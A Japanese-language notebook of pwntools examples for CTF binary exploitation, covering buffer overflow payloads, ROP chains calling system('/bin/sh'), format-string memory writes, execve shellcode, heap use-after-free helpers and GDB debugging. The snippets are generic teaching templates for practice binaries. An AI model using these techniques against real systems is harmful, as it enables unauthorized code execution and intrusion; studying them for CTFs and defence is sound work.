# Pwntools 使用例集

このノートブックでは、CTFでよく使用されるpwntoolsの実用的な使用例をまとめています。

## 1. 基本的な接続とI/O操作

In [ ]:
from pwn import *

# ローカルプロセスへの接続
p = process('./vulnerable_binary')

# リモートサーバーへの接続
# r = remote('ctf.example.com', 1337)

# データの送信
p.sendline(b'Hello, World!')

# データの受信
response = p.recvline()
print(response)

# 特定の文字列まで受信
p.recvuntil(b'Enter your name: ')
p.sendline(b'CTF Player')

# インタラクティブモード
# p.interactive()

## 2. パッキングとアンパッキング

In [ ]:
from pwn import *

# 32ビットと64ビットのパッキング
addr_32 = p32(0x08048000)  # 32ビットアドレス
addr_64 = p64(0x0000555555554000)  # 64ビットアドレス

print(f"32-bit packed: {addr_32.hex()}")
print(f"64-bit packed: {addr_64.hex()}")

# アンパッキング
unpacked_32 = u32(addr_32)
unpacked_64 = u64(addr_64)

print(f"32-bit unpacked: 0x{unpacked_32:08x}")
print(f"64-bit unpacked: 0x{unpacked_64:016x}")

## 3. バッファオーバーフロー攻撃の例

In [ ]:
from pwn import *

# ELFファイルの解析
elf = ELF('./vulnerable_binary')

# 関数のアドレスを取得
main_addr = elf.symbols['main']
system_addr = elf.plt['system']
got_puts = elf.got['puts']

print(f"main address: 0x{main_addr:x}")
print(f"system PLT: 0x{system_addr:x}")
print(f"puts GOT: 0x{got_puts:x}")

# ペイロードの作成
padding = b'A' * 64  # バッファサイズ
rbp = b'B' * 8       # 保存されたRBP
ret_addr = p64(0x401234)  # リターンアドレス

payload = padding + rbp + ret_addr

# プロセスに送信
# p = process('./vulnerable_binary')
# p.sendline(payload)

## 4. ROP (Return Oriented Programming)

In [ ]:
from pwn import *

# ROPガジェットの検索
elf = ELF('./vulnerable_binary')
rop = ROP(elf)

# pop rdi; ret ガジェットの検索
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
print(f"pop rdi; ret gadget: 0x{pop_rdi:x}")

# ROPチェーンの構築
rop_chain = flat([
    pop_rdi,
    next(elf.search(b'/bin/sh\x00')),  # /bin/shの文字列アドレス
    elf.symbols['system']
])

# 完全なペイロード
payload = b'A' * 64 + b'B' * 8 + rop_chain

## 5. フォーマット文字列攻撃

In [ ]:
from pwn import *

# フォーマット文字列でのメモリリーク
def leak_memory(offset):
    payload = f'%{offset}$p'.encode()
    p.sendline(payload)
    leak = p.recvline()
    return int(leak.decode().strip(), 16)

# 任意のアドレスへの書き込み
def write_memory(addr, value):
    # fmtstr_payload を使用
    payload = fmtstr_payload(6, {addr: value})
    return payload

# 使用例
# target_addr = 0x601020  # GOTエントリなど
# shell_addr = 0x400700   # system関数のアドレスなど
# payload = write_memory(target_addr, shell_addr)

## 6. シェルコード実行

In [ ]:
from pwn import *

# アーキテクチャの設定
context.arch = 'amd64'
context.os = 'linux'

# シェルコードの生成
shellcode = asm(shellcraft.sh())
print(f"Shellcode length: {len(shellcode)} bytes")
print(f"Shellcode: {shellcode.hex()}")

# カスタムシェルコード
custom_shellcode = asm("""
    xor rax, rax
    push rax
    mov rbx, 0x68732f2f6e69622f
    push rbx
    mov rdi, rsp
    push rax
    push rdi
    mov rsi, rsp
    xor rdx, rdx
    mov al, 0x3b
    syscall
""")

## 7. ヒープエクスプロイト基礎

In [ ]:
from pwn import *

# ヒープ関連の基本操作
def malloc(size, data):
    p.sendline(b'1')  # malloc option
    p.sendline(str(size).encode())
    p.sendline(data)

def free(index):
    p.sendline(b'2')  # free option
    p.sendline(str(index).encode())

def show(index):
    p.sendline(b'3')  # show option
    p.sendline(str(index).encode())
    return p.recvline()

# Use After Free の例
# malloc(0x20, b'A' * 0x20)
# malloc(0x20, b'B' * 0x20)
# free(0)
# free(1)
# malloc(0x20, p64(target_addr))

## 8. デバッグとGDB連携

In [ ]:
from pwn import *

# GDBでデバッグ
context.terminal = ['tmux', 'splitw', '-h']

# デバッグ付きでプロセスを起動
p = process('./vulnerable_binary')
gdb.attach(p, '''
    break *main+42
    continue
''')

# ブレークポイントで停止するまで待機
pause()

# ペイロードを送信
# p.sendline(payload)

## 9. 暗号関連ユーティリティ

In [ ]:
from pwn import *

# XOR操作
data = b'Hello, World!'
key = b'KEY'
encrypted = xor(data, key)
print(f"Encrypted: {encrypted.hex()}")
print(f"Decrypted: {xor(encrypted, key)}")

# Base64エンコード/デコード
encoded = b64e(b'CTF{flag_here}')
print(f"Base64: {encoded}")
decoded = b64d(encoded)
print(f"Decoded: {decoded}")

# MD5ハッシュ
hash_value = md5sumhex(b'password')
print(f"MD5: {hash_value}")

## 10. 便利なユーティリティ

In [ ]:
from pwn import *

# cyclic pattern生成（オフセット計算用）
pattern = cyclic(100)
print(f"Cyclic pattern: {pattern[:50]}...")

# オフセットの検索
# クラッシュ時のEIPの値が 0x61616173 だった場合
offset = cyclic_find(0x61616173)
print(f"Offset: {offset}")

# ファイル操作
write('exploit.py', '''
#!/usr/bin/env python3
from pwn import *

p = process('./vulnerable')
# exploit code here
p.interactive()
''')

# プログレスバー
with log.progress('Bruteforcing') as prog:
    for i in range(100):
        prog.status(f'{i}/100')
        # ブルートフォース処理
        sleep(0.01)